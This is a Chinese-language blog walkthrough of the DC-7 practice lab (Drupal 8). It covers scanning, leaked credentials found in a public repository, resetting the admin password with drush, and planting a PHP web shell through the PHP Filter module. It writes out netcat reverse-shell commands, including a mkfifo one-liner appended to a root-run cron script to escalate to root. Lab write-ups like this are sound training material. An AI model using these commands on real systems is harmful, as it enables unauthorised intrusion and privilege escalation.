dc7打靶报告

Le_ee 博客等级 码龄1年 Lv3
环境:

攻击机ip:Kali192.168.145.128

靶机ip:192.168.145.189

信息收集

arp-scan -l,发现存活靶机 192.168.145.189

识别开放端口和操作系统

nmap -A -p- 192.168.145.189

开放端口:22(SSH)、80(HTTP)——cms是drupal 8,服务器是Apache

操作系统:Linux

看一下web页面,提示这一关爆破和字典攻击都不一定有用

dirsearch -u http://192.168.145.189 -i 200,指定状态码200扫子url

逐个尝试一下,发现以下几个页面有有用回显

看到左下角有一个疑似靶场作者留下的标识

搜一下

看看存储库里的每个文件,方向对了

找到一组用户名和密码

因为之前开放了22端口,直接用这组密码远程连接试试

登录成功

sudo -l试了下用不了

ls发现有一个mbox,一个backups

backups里有两个加密文件

cat一下mbox发现几个root发的邮件,有一个定时任务

大约是15分钟执行一次

Cron任务执行的 脚本完整路径/opt/scripts/backups.sh

目前为止,我们还有个网页没有登录进去

Drupal网站备份数据库 最常用工具就是drush, drush 可以 直接重置Drupal用户密码

1
drush user-password admin --password="newpass123"

登录成功

左下角有一个add content ,我们试试能不能写个马进去,发现文本格式没有php的

在manage里找到了extend

安装文本格式php的工具插件

安装PHP Filter模块

再回去artical编辑那里,发现文本形式可以选择php了

写入一句话木马

保存

蚁剑成功连接

建立反弹shell

kali:nc -lvnp 1234

<strong>&#x865A;&#x62DF;&#x7EC8;&#x7AEF;&#xFF1A;</strong>nc -e /bin/bash 192.168.145.128 1234

然后我们将一段能建立 反向Shell的代码追加到 /opt/scripts/backups.sh 文件中,等cron以 root权限执行该脚本时,就能获得一个root shell

echo “rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.145.128 5555 >/tmp/f” >> /opt/scripts/backups.sh

1
2
3
4
5
rm /tmp/f;                    # &#x5220;&#x9664;&#x65E7;&#x7684;&#x7BA1;&#x9053;&#x6587;&#x4EF6;&#xFF08;&#x5982;&#x679C;&#x5B58;&#x5728;&#xFF09;
mkfifo /tmp/f; # &#x521B;&#x5EFA;&#x547D;&#x540D;&#x7BA1;&#x9053;&#x6587;&#x4EF6; /tmp/f
cat /tmp/f | # &#x8BFB;&#x53D6;&#x7BA1;&#x9053;&#x5185;&#x5BB9;
/bin/sh -i 2>&1 | # &#x542F;&#x52A8;&#x4EA4;&#x4E92;&#x5F0F;shell&#xFF0C;&#x5E76;&#x5C06;&#x9519;&#x8BEF;&#x8F93;&#x51FA;&#x91CD;&#x5B9A;&#x5411;&#x5230;&#x6807;&#x51C6;&#x8F93;&#x51FA;
nc 192.168.145.128 5555 > /tmp/f # &#x8FDE;&#x63A5;&#x5230;&#x653B;&#x51FB;&#x8005;&#x673A;&#x5668;(192.168.145.128:5555)&#xFF0C;&#x5E76;&#x5C06;&#x63A5;&#x6536;&#x5230;&#x7684;&#x6570;&#x636E;&#x5199;&#x5165;&#x7BA1;&#x9053;

等待root执行定时任务

kali监听nc -lvnp 5555

完结撒花!!

  • Title: dc7打靶报告
  • Author: Le_ee 博客等级 码龄1年
  • Created at : 2026-02-05 03:02:10
  • Updated at : 2026-02-05 11:04:46
  • Link: https://leei.site/2026/02/05/dc7打靶报告/
  • License: This work is licensed under CC BY-NC-SA 4.0.
Comments
On this page
dc7打靶报告